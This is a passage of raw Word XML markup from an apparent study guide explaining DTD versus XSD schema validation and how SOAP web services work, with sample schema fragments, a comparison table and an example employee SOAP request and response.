    <w:p w14:paraId="0D8CC9A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DOCTYPE book [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D216C0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book (title, author, year)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363935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title (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD033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author (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E82F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 xml:space="preserve">    &lt;!ELEMENT year (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3811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t;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360B579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6C2D3EB5"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implicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DTD is simpler and has been around since the early days of XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB9EB1"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Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: DTD only supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>text-based data</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and lacks strong data typing. It doesn't allow specifying complex data types (e.g., integer, date).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0493A660"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 Namespace Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DTD doesn't support XML namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F625B96"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oose Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DTD doesn't offer detailed validation, making it less robust than XSD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6051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69236454" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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TD is still used in certain legacy systems but is generally replaced by XSD for more complex requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCD9A3"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5F8C0">
          <v:rect id="_x0000_i1967" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6040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 (XML Schema Definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75946045"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SD is a more powerful and flexible way to define the structure and data types of an XML document. It is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>recommended</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> schema definition language for XML documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E22F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62D026C9" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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written using XML syntax itself. It allows more control over data types, structures, and relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CCAA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 xmlns:xs="http://www.w3.org/2001/XMLSchema"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A850F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book"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238340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3130F83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3EB014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title" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400F2E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author" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33737B9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year" type="xs:int"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7059D48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413B3C7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188BCA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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E42A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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30EC1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38DEC9E3"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ich Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XSD provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rich data type support</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including strings, integers, dates, booleans, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3C987"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 Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XSD allows the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML namespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which helps avoid element name conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0487258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onger Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XSD allows stricter validation and provides rules for </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>min/max occurrences</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default values</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data types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB650BA"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 XSD is more complex than DTD but provides much more powerful features for validating XML data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043D66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 xml:space="preserve">: XSD supports advanced features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inheritance</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reusabil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custom data types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583DC7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0EACC467" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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the modern choice for XML schema definition and is widely used in enterprise applications, SOAP web services, and XML-based data exchanges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F765BC"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4B498">
          <v:rect id="_x0000_i1968" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7206874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2997"/>
        <w:gridCol w:w="5695"/>
      </w:tblGrid>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="0C2E9C40" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F7FBE0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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A9DE4B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C1D5AA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="2A8DE3B0" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="732CED4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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D97DF8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clarative syntax (non-XML)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666778B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ML-based syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="620CB45A" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2064920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Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4408F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complex data types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4619ACF3"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a wide range of data types (e.g., integer, string, date)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="20252443" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C6FC4E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06E0999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namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71713C5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namespaces for avoiding element name conflicts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="5C369970" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BECD09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Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="570C12A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oose validation (limited checks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0534F8B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trong validation with detailed rules (e.g., min/max occurrences, data types)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="59A213C8" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A93B6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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385980F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impler and less powerful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CB6532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More complex but more powerful and flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="1AA3847C" w14:textId="77777777" w:rsidTr="00B43DDB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39DDB41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operability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="095318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mited support for advanced features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53D12C7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Widely used in modern XML applications, including web services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E1E45D1"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0F2B4">
          <v:rect id="_x0000_i1969" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69225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6E564A86"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DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is older, simpler, and has limited validation capabilities. It's mainly used for basic XML structure validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75F35B"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D</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more robust, supports complex data types, namespaces, and provides stronger validation capabilities, making it the preferred choice for modern XML-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399FCE6A" w14:textId="3269196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70" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5428E9" w14:textId="7E88220C" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A96C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="416" w:name="_Toc197867630"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain SOAP Web Service</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="416"/>
    </w:p>
    <w:p w14:paraId="22374861" w14:textId="42E48A20" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE087B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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP (Simple Object Access Protocol) Web Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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E1219A">
          <v:rect id="_x0000_i1971" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AE67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Components of SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754979DD"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The core structure of a SOAP message is the </w:t>
      </w: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 which contains the header and body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED50A80"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains metadata and optional attributes (e.g., authentication, transaction-related information).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0083AC"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Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the actual message data or payload, which is typically an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C86003"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SDL (Web Services Description Languag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DDI (Universal Description, Discovery, and Integra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UDDI is a directory service where businesses can register and discover SOAP web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D9E6A"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Schema (XSD)</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efines the structure of the data exchanged in SOAP messages. It ensures that the SOAP message adheres to a predefined format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52231A1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D2D7AD">
          <v:rect id="_x0000_i1972" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD503B"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ow SOAP Web Service Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBB9C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Reques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A client sends an XML request to a SOAP web service. This request includes the SOAP envelope, which contains the SOAP header (optional) and body (required with the request payload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442F90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ice Process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processes the SOAP request. It extracts the necessary data from the SOAP body, performs the required operations (business logic), and prepares a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48589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er Respons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sends an XML response back to the client within a SOAP envelope. The response contains the SOAP body with the output data (results, status, etc.) in XML format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA95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Handl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client processes the response (also in XML format) and performs any further actions or displays results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F01D2"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8F3AB">
          <v:rect id="_x0000_i1973" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975920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 Message Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7108D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re’s an example of a SOAP request and response message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CED3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quest (XML format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4E0A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33BB0457"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28A254C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769A06B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E017B5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9E4B99A"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6B1275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Id&gt;123&lt;/web:employeeId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553FA2C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5557D0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BAA0DE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05E3E54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sponse (XML format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0B66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lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1874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0870433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55CEFE8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10661D3"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CE38FA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710AD5C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Name&gt;John Doe&lt;/web:employeeName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B73BA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Role&gt;Software Developer&lt;/web:employeeRole&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B778CB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Salary&gt;70000&lt;/web:employeeSalary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D502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5AD88038"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EBBC9F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453F2E7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8CF91">
          <v:rect id="_x0000_i1974" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5839D"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Advantages of SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6DA5A"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latform-Independen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work across various platforms and programming languages, making them interoperable. SOAP messages are in XML format, which is platform-agnostic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723910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cur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Security, which provides a higher level of security for web services, such as encryption, authentication, and message integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E92D3"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ia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ReliableMessaging, ensuring that messages are delivered reliably even in the case of network failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3A317"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andardized Protocol</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highly standardized and formalized, ensuring consistency and compatibility across different systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624553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can support additional features (e.g., security, transactions, etc.) through extensions like WS-Security, WS-AtomicTransaction, and WS-ReliableMessaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4F63F"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FF5D2">
          <v:rect id="_x0000_i1975" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7804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isadvantages of SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C907F14"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more complex to implement compared to REST due to its reliance on XML, WSDL, and additional standards (such as WS-Security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67FBF5"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erformanc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messages are typically larger than REST messages (especially when using XML), leading to higher overhead and slower performance, particularly in scenarios where the payload is small.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639A9BD"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Flex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uses XML exclusively for communication and is not as flexible as REST, which supports multiple formats (e.g., JSON, XML, plain text).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31994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654C6">
          <v:rect id="_x0000_i1976" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D29FBA"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When to Use SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65464F0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nterprise-level applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need robust security, reliability, and transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5551A83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egacy systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
